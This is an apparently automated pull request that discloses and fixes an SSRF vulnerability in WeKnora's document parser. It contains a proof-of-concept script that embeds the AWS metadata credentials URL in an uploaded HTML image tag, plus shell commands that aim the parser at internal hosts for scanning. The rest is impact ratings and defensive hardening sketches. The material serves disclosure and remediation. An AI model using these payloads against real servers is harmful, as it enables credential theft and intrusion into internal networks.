[Security] Fix CRITICAL vulnerability: V-001

Open orbisai0security opened this issue 1 month ago • 0 comments

Security Fix

This PR addresses a CRITICAL severity vulnerability detected by our security scanner.

Security Impact Assessment

Aspect	Rating	Rationale
Impact	High	In the WeKnora repository, which appears to be a document parsing and knowledge extraction system, exploiting this SSRF could allow attackers to access internal network resources, potentially exposing sensitive data from connected databases or APIs used for multimodal processing. This could lead to data breaches or further compromise of the system's knowledge graph components, impacting confidentiality and integrity of processed documents.
Likelihood	Medium	Given WeKnora's context as an AI-driven document reader likely deployed in environments processing user-provided content, the attack surface is present if users can submit documents with image URLs. However, exploitation requires crafting malicious URLs and depends on the system's deployment (e.g., public-facing vs. internal), making it moderately likely with targeted attacks rather than opportunistic ones.
Ease of Fix	Medium	Remediation involves implementing URL validation in base_parser.py, such as checking against an allow-list or blocking internal IP ranges, which requires modifying the parsing logic and potentially updating related components for consistency. This could introduce moderate testing effort to ensure no regressions in document processing workflows, but avoids major architectural changes.
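The allow-list option mentioned under Ease of Fix could look roughly like the sketch below. This is not the code in this PR: `ALLOWED_IMAGE_HOSTS`, its example hostnames, and `host_is_allow_listed` are hypothetical names chosen for illustration, and the real list would depend on where a given deployment expects images to come from.

```python
from urllib.parse import urlsplit

# Hypothetical allow-list; a real deployment would load this from configuration.
ALLOWED_IMAGE_HOSTS = frozenset({"images.example.com", "cdn.example.com"})


def host_is_allow_listed(url, allowed_hosts=ALLOWED_IMAGE_HOSTS):
    """Return True only if the URL is http(s) and its host is an exact allow-list match."""
    try:
        parts = urlsplit(url)
    except ValueError:
        # Malformed URLs (e.g. unbalanced IPv6 brackets) are rejected outright.
        return False
    if parts.scheme not in ("http", "https"):
        return False
    # urlsplit lowercases the hostname and strips any "user@" prefix;
    # a trailing dot (fully qualified form) is normalised away here.
    host = (parts.hostname or "").rstrip(".")
    return host in allowed_hosts
```

Exact matching is deliberate: suffix or substring checks would accept hosts such as `images.example.com.evil.test`, and parsing with `urlsplit` rather than string searching avoids being fooled by `http://images.example.com@169.254.169.254/`.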

Evidence: Proof-of-Concept Exploitation Demo

⚠️ For Educational/Security Awareness Only

This demonstration shows how the vulnerability could be exploited to help you understand its severity and prioritize remediation.

How This Vulnerability Can Be Exploited

The vulnerability in docreader/parser/base_parser.py allows an attacker to perform Server-Side Request Forgery (SSRF) by providing malicious URLs in document content that the parser fetches as images. In the context of WeKnora, a document reader likely used for parsing user-uploaded or shared documents (e.g., PDFs or web content), an attacker can embed URLs pointing to internal network resources, causing the server to make unauthorized requests and potentially expose sensitive data or trigger internal actions. This exploit is straightforward in a web-facing deployment of WeKnora, where documents are processed via API endpoints or file uploads.

To demonstrate exploitation, assume WeKnora is deployed as a web service that accepts documents for parsing. An attacker needs to provide a document containing a malicious image URL. The following steps show how to craft and deliver such a payload, targeting the base_parser.py logic that fetches images without validation. The endpoint path, hostname, and CLI command used in the steps are assumed for illustration and are not confirmed WeKnora interfaces.

# Exploit script: Craft a malicious document (e.g., a simple HTML file mimicking a parsed document)
# This assumes WeKnora accepts document uploads or API inputs for parsing.
# In a real scenario, upload this via the WeKnora web interface or API endpoint (e.g., POST to /parse or similar, based on repo's API structure).

import requests

# Step 1: Create a malicious document payload (e.g., HTML with an embedded image URL)
# The URL points to an internal resource, like AWS metadata service or a local service.
malicious_doc = """
<html>
<body>
<img src="http://169.254.169.254/latest/meta-data/iam/security-credentials/" />
</body>
</html>
"""

# Step 2: Encode or prepare the document for upload (WeKnora likely accepts base64 or file uploads)
# Assuming an API endpoint like /api/parse_document (inferred from similar parsers)
files = {'document': ('malicious.html', malicious_doc, 'text/html')}

# Step 3: Send the request to the WeKnora server (replace with actual target URL)
# This triggers base_parser.py to fetch the image URL, performing SSRF.
response = requests.post(
    'http://target-weknora-server.com/api/parse_document',
    files=files,
    timeout=30,  # avoid hanging indefinitely if the server stalls on the internal fetch
)

# Step 4: Observe the response. The server attempts the internal fetch either way;
# data (e.g., IAM role names from the AWS metadata service) is leaked only if the parser
# returns fetched content in its output. Otherwise the SSRF is blind.
print(response.text)

# Alternative (shell commands): if WeKnora is a CLI tool or accepts direct file input (based on parser structure),
# an attacker could run it locally or via a compromised environment.

# Step 1: Create a malicious document file
echo '<html><body><img src="http://localhost:8080/internal-api/status" /></body></html>' > malicious.html

# Step 2: Invoke WeKnora's parser (assuming it has a command-line interface like 'weknora parse')
# This would cause the base_parser.py to fetch the internal URL.
./weknora parse malicious.html

# Step 3: Monitor network traffic or logs - the server will make a request to localhost:8080,
# potentially exposing internal service status or data.
# For broader scanning, replace with URLs like http://10.0.0.1:22 (internal SSH) or http://internal-db:5432.

Exploitation Impact Assessment

Impact Category	Severity	Description
Data Exposure	High	Successful SSRF could access sensitive internal resources, such as cloud metadata (e.g., AWS IAM credentials), internal APIs (e.g., database status or user data), or configuration files. In WeKnora's context as a document parser handling potentially confidential documents (e.g., business reports or user-shared files), leaked data might include API keys, session tokens, or proprietary information stored on internal services.
System Compromise	Medium	While SSRF alone doesn't grant direct code execution, it could enable pivoting to further attacks, such as exploiting vulnerable internal services (e.g., an open Redis instance) to gain user-level access or escalate via chained vulnerabilities. In a containerized deployment, this might allow probing for host escapes, but full compromise would require additional weaknesses.
Operational Impact	Medium	An attacker could use SSRF for internal network scanning or DoS by targeting slow/unresponsive internal endpoints, causing resource exhaustion on the WeKnora server. In a high-traffic scenario (e.g., processing many documents), this could degrade service availability, but it's unlikely to cause complete outages without sustained attacks.
Compliance Risk	High	Falls under OWASP Top 10 category A10:2021 (Server-Side Request Forgery) and could lead to GDPR breaches if the exposed internal data includes EU user information. For Tencent's ecosystem, it risks non-compliance with Chinese data security regulations (e.g., PIPL) if sensitive user documents are processed, potentially triggering audits or fines.
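The Operational Impact row points at slow or unresponsive internal endpoints. Independently of URL validation, the fetch itself can be bounded. The sketch below is an assumption about how that might be done with the standard library, not the code in this PR; `fetch_image_bytes`, its default limits, and `_NoRedirect` are hypothetical names.

```python
import urllib.request


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Refuse to follow redirects so a validated URL cannot bounce to an internal one."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        # Returning None makes urllib raise HTTPError for the 3xx response.
        return None


def fetch_image_bytes(url, timeout=5.0, max_bytes=10 * 1024 * 1024):
    """Fetch a URL with a timeout, no redirects, and a hard cap on body size."""
    opener = urllib.request.build_opener(_NoRedirect)
    with opener.open(url, timeout=timeout) as resp:
        # Read one byte past the cap so oversized bodies can be detected.
        data = resp.read(max_bytes + 1)
    if len(data) > max_bytes:
        raise ValueError("image exceeds size limit")
    return data
```

The timeout limits how long a single unresponsive target can hold a worker, and the size cap limits memory use. Refusing redirects matters because a public URL that passes validation can otherwise redirect the server to an internal address.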

Vulnerability Details

Rule ID: V-001
File: docreader/parser/base_parser.py
Description: The application fetches images from user-provided URLs without validating them against an allow-list or checking for internal IP addresses. This allows an attacker to force the server to make requests to internal network resources.
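The internal-address check described above can be sketched as follows. This is a minimal illustration under stated assumptions, not the code in this PR: `is_safe_image_url` and `_is_public_ip` are hypothetical names, and the `resolve` parameter exists only so the resolver can be swapped out in tests.

```python
import ipaddress
import socket
from urllib.parse import urlsplit


def _is_public_ip(addr: str) -> bool:
    """Return True only for addresses outside internal and special-purpose ranges."""
    ip = ipaddress.ip_address(addr.split("%", 1)[0])  # drop any IPv6 zone id
    # Unwrap IPv4-mapped IPv6 such as ::ffff:127.0.0.1 before classifying.
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return not (
        ip.is_private
        or ip.is_loopback
        or ip.is_link_local  # covers 169.254.169.254 (cloud metadata)
        or ip.is_multicast
        or ip.is_reserved
        or ip.is_unspecified
    )


def is_safe_image_url(url: str, resolve=socket.getaddrinfo) -> bool:
    """Accept only http(s) URLs whose host resolves exclusively to public addresses."""
    try:
        parts = urlsplit(url)
        port = parts.port or (443 if parts.scheme == "https" else 80)
    except ValueError:
        return False  # malformed URL or invalid port
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    try:
        infos = resolve(parts.hostname, port, proto=socket.IPPROTO_TCP)
    except (OSError, UnicodeError):
        return False  # unresolvable or invalid hostname
    addresses = {info[4][0] for info in infos}
    # Reject if there are no addresses or if any resolved address is internal.
    return bool(addresses) and all(_is_public_ip(a) for a in addresses)
```

A check like this resolves the hostname at validation time, so on its own it does not stop DNS rebinding, where the name resolves to a different address when the image is actually fetched. Connecting to the already-validated IP address and re-validating any redirect target closes that gap.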

Changes Made

This automated fix addresses the vulnerability by applying security best practices.

Files Modified

docreader/parser/base_parser.py
internal/mcp/client.go

Verification

This fix has been automatically verified through:

✅ Build verification
✅ Scanner re-scan
✅ LLM code review

🤖 This PR was automatically generated.

Jan 08 '26 09:01 orbisai0security